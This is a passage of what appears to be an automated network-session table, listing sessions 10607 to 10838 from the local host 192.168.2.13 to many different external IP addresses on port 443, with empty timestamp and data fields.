                              10607192.168.2.1336098154.122.96.195443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10608192.168.2.1360420199.176.34.110443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10609192.168.2.1350620168.205.104.232443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10610192.168.2.136075219.182.186.34443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10611192.168.2.135374248.169.43.45443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10612192.168.2.1341538148.122.65.77443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10613192.168.2.1350832107.66.59.79443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10614192.168.2.1332840160.51.218.191443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10615192.168.2.1359264220.155.80.195443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10616192.168.2.1337578209.205.199.253443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10617192.168.2.1335568203.240.246.208443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10618192.168.2.135169484.146.68.128443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10619192.168.2.133415286.203.2.165443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10620192.168.2.1348016136.229.32.216443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10621192.168.2.133525862.33.236.89443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10622192.168.2.136038225.192.0.58443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10623192.168.2.1333606115.112.55.76443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10624192.168.2.1347886148.9.203.127443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10625192.168.2.134341070.204.228.159443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10626192.168.2.1335264159.169.20.174443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10627192.168.2.134889277.83.52.196443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10628192.168.2.135763847.201.70.185443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10629192.168.2.134446627.40.234.199443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10630192.168.2.135270878.179.91.102443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10631192.168.2.1338252211.114.160.24443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10632192.168.2.1352512151.209.71.111443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10633192.168.2.133819494.216.167.248443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10634192.168.2.133636259.236.159.220443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10635192.168.2.1360650203.110.217.183443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10636192.168.2.1341380108.211.167.194443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10637192.168.2.1342154168.245.194.30443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10638192.168.2.1340204114.73.99.211443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10639192.168.2.1347730159.71.253.51443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10640192.168.2.134904287.2.148.203443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10641192.168.2.135287697.63.39.244443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10642192.168.2.134812654.247.64.229443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10643192.168.2.134178462.200.48.125443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10644192.168.2.1356880185.101.0.42443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10645192.168.2.1354114142.144.175.76443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10646192.168.2.134589682.233.219.65443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10647192.168.2.1347652181.176.245.93443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10648192.168.2.1345058140.59.93.82443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10649192.168.2.1358940181.228.49.179443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10650192.168.2.1343848129.78.179.63443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10651192.168.2.1356898174.236.39.204443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10652192.168.2.1355704190.228.35.232443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10653192.168.2.133356669.198.210.65443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10654192.168.2.1351240130.140.111.134443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10655192.168.2.135698854.56.34.118443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10656192.168.2.1350622168.46.252.158443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10657192.168.2.1345868180.68.238.218443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10658192.168.2.135897241.14.151.80443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10659192.168.2.1346314204.250.62.203443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10660192.168.2.135423480.169.171.241443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10661192.168.2.1345052134.36.147.124443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10662192.168.2.1356350149.2.161.47443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10663192.168.2.13537909.83.142.231443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10664192.168.2.1360738205.244.233.75443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10665192.168.2.1348870144.246.76.147443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10666192.168.2.1357058205.229.10.104443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10667192.168.2.13361149.160.161.86443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10668192.168.2.1346846204.230.156.16443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10669192.168.2.1359340111.177.73.97443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10670192.168.2.1347480175.4.167.119443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10671192.168.2.133997690.158.178.143443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10672192.168.2.13527068.192.180.79443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10673192.168.2.1353158139.183.251.145443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10674192.168.2.134630697.98.154.182443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10675192.168.2.13488285.72.58.211443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10676192.168.2.1344452132.95.230.250443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10677192.168.2.1360832174.238.193.123443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10678192.168.2.1333954186.106.1.64443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10679192.168.2.1354860163.12.217.35443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10680192.168.2.1346958163.228.244.79443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10681192.168.2.135249696.180.167.232443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10682192.168.2.134707024.140.50.56443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10683192.168.2.1336536153.248.101.7443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10684192.168.2.135733835.224.142.42443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10685192.168.2.1356490207.246.153.193443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10686192.168.2.1350776105.200.104.216443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10687192.168.2.1334918158.2.5.105443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10688192.168.2.134445291.50.140.237443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10689192.168.2.1360364166.119.76.102443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10690192.168.2.1359146223.64.233.52443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10691192.168.2.1338862135.196.165.141443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10692192.168.2.1345650182.122.175.47443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10693192.168.2.1357838133.97.32.134443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10694192.168.2.133674267.155.90.109443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10695192.168.2.1351860195.254.139.170443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10696192.168.2.1360486123.149.53.168443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10697192.168.2.1353094129.191.4.166443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10698192.168.2.1352250141.35.14.196443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10699192.168.2.1339424203.41.66.76443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10700192.168.2.135133488.95.238.159443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10701192.168.2.1339054170.101.29.229443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10702192.168.2.135323050.131.254.110443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10703192.168.2.133508249.229.91.28443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10704192.168.2.1339094179.177.235.166443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10705192.168.2.1352392211.96.86.160443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10706192.168.2.1349358156.214.198.90443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10707192.168.2.1347130146.223.234.144443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10708192.168.2.1341584136.167.38.76443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10709192.168.2.135308618.17.5.8443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10710192.168.2.133511842.58.146.175443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10711192.168.2.1357982115.192.168.191443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10712192.168.2.1337704175.253.218.189443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10713192.168.2.1352606191.239.240.155443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10714192.168.2.1355404116.255.184.219443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10715192.168.2.135092825.94.224.245443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10716192.168.2.133372054.131.205.75443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10717192.168.2.1355310124.197.249.128443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10718192.168.2.13375801.74.147.7443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10719192.168.2.1360220104.249.226.87443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10720192.168.2.1353740130.216.75.172443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10721192.168.2.13475281.206.6.91443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10722192.168.2.1353772151.115.125.112443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10723192.168.2.13503762.138.85.227443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10724192.168.2.1334132170.27.152.160443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10725192.168.2.1354390206.187.36.242443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10726192.168.2.135480042.88.47.84443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10727192.168.2.135373864.13.146.234443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10728192.168.2.1348336160.60.213.159443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10729192.168.2.1354750125.116.183.135443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10730192.168.2.136014623.213.176.180443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10731192.168.2.135552250.48.177.146443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10732192.168.2.135947885.165.53.61443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10733192.168.2.1343026181.241.8.122443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10734192.168.2.133706034.186.221.243443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10735192.168.2.1343540106.123.206.8443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10736192.168.2.1351102220.230.9.148443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10737192.168.2.1332818104.6.12.36443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10738192.168.2.13339969.111.230.65443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10739192.168.2.1345788131.31.72.78443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10740192.168.2.135401041.125.80.186443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10741192.168.2.135922470.171.44.52443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10742192.168.2.133684049.62.219.219443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10743192.168.2.1340510188.6.200.136443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10744192.168.2.1344606130.205.244.62443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10745192.168.2.133605666.224.71.14443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10746192.168.2.135138617.44.4.225443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10747192.168.2.1340092198.233.7.112443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10748192.168.2.135340831.71.157.36443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10749192.168.2.1344460165.159.14.57443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10750192.168.2.134252612.161.180.124443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10751192.168.2.1348984107.139.43.7443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10752192.168.2.1349858205.42.117.74443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10753192.168.2.135464223.192.220.211443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10754192.168.2.1333140189.213.38.139443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10755192.168.2.1352554164.242.95.114443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10756192.168.2.1343596168.101.125.86443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10757192.168.2.1343722211.161.12.101443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10758192.168.2.134503276.165.145.117443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10759192.168.2.135231625.217.209.245443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10760192.168.2.1336594121.1.36.43443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10761192.168.2.1340264156.121.239.20443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10762192.168.2.133787883.62.218.194443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10763192.168.2.134338683.152.189.197443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10764192.168.2.134313446.24.175.17443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10765192.168.2.1339902113.80.29.10443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10766192.168.2.1355036213.107.228.98443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10767192.168.2.1348194200.101.152.202443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10768192.168.2.135213677.174.199.9443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10769192.168.2.134644848.143.188.20443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10770192.168.2.1345618110.250.178.48443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10771192.168.2.1340408164.252.69.233443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10772192.168.2.134750867.70.133.192443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10773192.168.2.1356494217.44.143.223443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10774192.168.2.1339562210.142.202.59443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10775192.168.2.1341650157.63.184.46443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10776192.168.2.134993895.77.14.159443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10777192.168.2.1346106133.222.32.90443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10778192.168.2.1354984182.70.87.141443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10779192.168.2.1348110211.77.212.25443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10780192.168.2.133765490.122.228.50443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10781192.168.2.133500672.237.128.135443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10782192.168.2.1336194205.143.139.142443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10783192.168.2.1356862169.107.76.10443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10784192.168.2.1342496102.250.42.136443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10785192.168.2.134615681.64.164.23443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10786192.168.2.134299059.40.108.248443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10787192.168.2.134785296.253.148.80443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10788192.168.2.1337050136.113.135.213443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10789192.168.2.1340108150.110.186.181443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10790192.168.2.134889490.16.209.206443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10791192.168.2.1347876137.66.195.39443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10792192.168.2.1352318105.145.134.124443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10793192.168.2.1334772187.188.88.106443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10794192.168.2.135420239.49.50.113443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10795192.168.2.134198244.46.57.60443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10796192.168.2.1358250220.175.68.1443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10797192.168.2.13399761.103.27.6443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10798192.168.2.13545482.83.67.76443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10799192.168.2.133673257.42.109.63443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10800192.168.2.1356574213.192.115.245443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10801192.168.2.135454491.144.244.218443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10802192.168.2.1342988141.168.203.218443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10803192.168.2.134700684.82.42.232443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10804192.168.2.134421497.3.84.114443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10805192.168.2.1342002192.180.29.43443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10806192.168.2.133397840.243.143.90443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10807192.168.2.1346498130.103.70.214443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10808192.168.2.133632079.113.141.233443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10809192.168.2.135024894.217.159.19443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10810192.168.2.1355062161.198.71.188443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10811192.168.2.135222659.215.121.249443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10812192.168.2.1338346134.214.216.151443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10813192.168.2.134648670.77.101.149443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10814192.168.2.1339754108.47.218.25443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10815192.168.2.1354936198.167.22.157443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10816192.168.2.134289425.58.201.125443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10817192.168.2.1348320211.44.127.111443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10818192.168.2.13456121.29.10.212443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10819192.168.2.1348204115.141.124.166443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10820192.168.2.134480272.71.244.161443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10821192.168.2.1336754177.184.207.105443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10822192.168.2.135049231.225.59.128443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10823192.168.2.1337362149.156.239.212443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10824192.168.2.1339246157.23.0.140443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10825192.168.2.1347736157.123.59.109443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10826192.168.2.133643465.196.7.17443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10827192.168.2.134935664.189.201.28443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10828192.168.2.135595884.167.131.222443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10829192.168.2.1342070143.231.246.81443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10830192.168.2.134716219.190.105.30443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10831192.168.2.134823423.244.111.167443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10832192.168.2.1334586194.179.82.169443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10833192.168.2.1357712203.137.119.53443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10834192.168.2.1339960173.29.232.244443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10835192.168.2.1356642194.50.176.215443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10836192.168.2.133340071.131.23.148443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10837192.168.2.136025058.238.236.154443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              10838192.168.2.134402419.112.163.90443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
